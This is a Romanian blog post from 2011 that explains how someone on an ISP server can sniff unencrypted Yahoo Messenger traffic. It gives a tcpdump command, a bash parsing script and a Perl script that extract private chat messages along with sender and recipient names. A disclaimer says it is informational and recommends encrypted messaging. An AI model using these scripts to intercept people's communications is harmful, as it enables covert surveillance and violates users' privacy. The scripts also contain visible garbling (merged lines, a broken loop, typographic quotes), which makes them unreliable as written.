22 octombrie 2011

Cum pot autoritatile citi toate conversatiile de Yahoo Messenger din serverul providerului de net

Linuxul ofera multe posibilitati de a afla amanunte despre reteau ta sau despre userii din retea pe care ii ai. Insasi distributia de Linux vine cu un sniffer foarte frumos, pe care daca stii sa-l folosesti iti poate oferi toate informatiile. TCPDUMP

Mai jos este un tutorial care arata publicului o metoda de sniff, prin care conversatiile din Yahoo Messenger pot fi citite in mod text daca te afli pe serverul providerului de internet. indiferent de sistemul de operare al utilizatorilor, in serverul de linux conversatiile acestora pot fi regasite in trafic.

Pentru ca aceste conversatii nu sunt criptate, pot fi separate din traficul de retea cu urmatorul script:[root#server /]# tcpdump -i eth0 src or dst port 5050 -s 1000 -A -l -t > file.log

Pentru cine va incerca comanda respectiva, va constata ca fisierul destinatie file.log contine o sumedenie de linii inutile.

Asadar am considerat ca ar fi cazul sa mai subtiez putintel continutul pentru a extrage exact ceea ce ne intereseaza exact:
[root@server /]# pico /bin/parser
#! /bin/bashecho -n
echo “Parsing file [ $1 ] to file [ $2 ]”
echo -n
echo -n
cat $1 |grep ‘YMSG’ > /tmp/2107xxtmp.tmp
cat /tmp/2107xxtmp.tmp | grep -v ‘PEERTOPEER’ > /tmp/2108xxtmp.tmp
cat /tmp/2108xxtmp.tmp | grep -v ‘yahoofs’ > /tmp/2107xxtmp.tmp
cat /tmp/2107xxtmp.tmp | grep -v ‘..47..’ > /tmp/2108xxtmp.tmp
cat /tmp/2108xxtmp.tmp | grep -v ‘Skin’ > /tmp/2107xxtmp.tmp
cat /tmp/2107xxtmp.tmp | grep -v ‘..13..’ > /tmp/2108xxtmp.tmp
cat /tmp/2108xxtmp.tmp | grep -v ‘TYPING’ > /tmp/2107xxtmp.tmp
mv /tmp/2107xxtmp.tmp /tmp/2108xxtmp.tmp
cat /tmp/2108xxtmp.tmp | gawk -F ‘..97..’ ‘{print $1}’ > /tmp/2107xxtmp.tmp
cat /tmp/2107xxtmp.tmp | gawk -F ‘YMSG’ ‘{print $2}’ > /tmp/2108xxtmp.tmp
cat /tmp/2108xxtmp.tmp | gawk -F ‘..14..’ ‘{print $1, $2}’ > $2
echo “Parse done… type pico $2 to view results”
rm -f /tmp/2107xxtmp.tmp
rm -f /tmp/2108xxtmp.tmp

[root@server /]# chmod 777 /bin/parser
[root@server /]# parser /root/file.log /root/clean.log


Nota: Veti obeserva ca rezultatul mai contine ceva caractere. Incerc sa scap de ele, dar asta intr-o versiune viitoare
ngrep |perl ymsg.pl
cat ymsg.pl
#!/usr/bin/perl
while () {
if ( m/YMSG(.*)\.\.49\.\.TYPING\.\.1\.\.(\w+)\.\.(.*)\.\.5\.\.(\w+)\.\.(.*)/ ) {
print(”$2 is typing to $4\n”);
}
if ( m/YMSG(.*)\.\.75\.\.(\w+)\.\.\d\.\.(\w+)\.\.(.*)\.\.14\.\.(.*)\.\./ ) {
print(”$2 recieved a message from $3: $5\n”);
}
if ( m/YMSG(.*)\.\.1\.\.(\w+)\.\.5\.\.(\w+)\.\.(.*)\.\.14\.\.(.*)\.\.63\.\.\;/ ) {
print(”$2 sent a message to $3: $5\n”);
}
}


Nota: KeepTheDistance si DoubleSense nu-si asuma responsabilitatea pentru eventualele nefunctionari ale scriptului sau eventualele pagube asupra vreo-unui server prin folosirea incorecta a scriptului de mai sus. Deasemnea KeepTheDistance si DoubleSense nu isi asma riscul privind incidenta legilor din Romania asupra prelucrarii datelor cu caracter personal si protectia vietii private (legea 506/2004 -> http://www.legi-internet.ro/date_pers.html). Preluare din arhiva keepthedistance.org

Acest continut este pur informativ si cu scop de tutorial. Este interzisa folosirea scriptului in scopuri malefice, de spionare a persoanelor din retea, asa cum fac autoritatile. Pentru conversatii de instant messaging mai sigure, folositi Miranda, cu modul de criptare a conversatilor.


preluare de pe sursa: Centrul de Informare Alternativa

Niciun comentariu: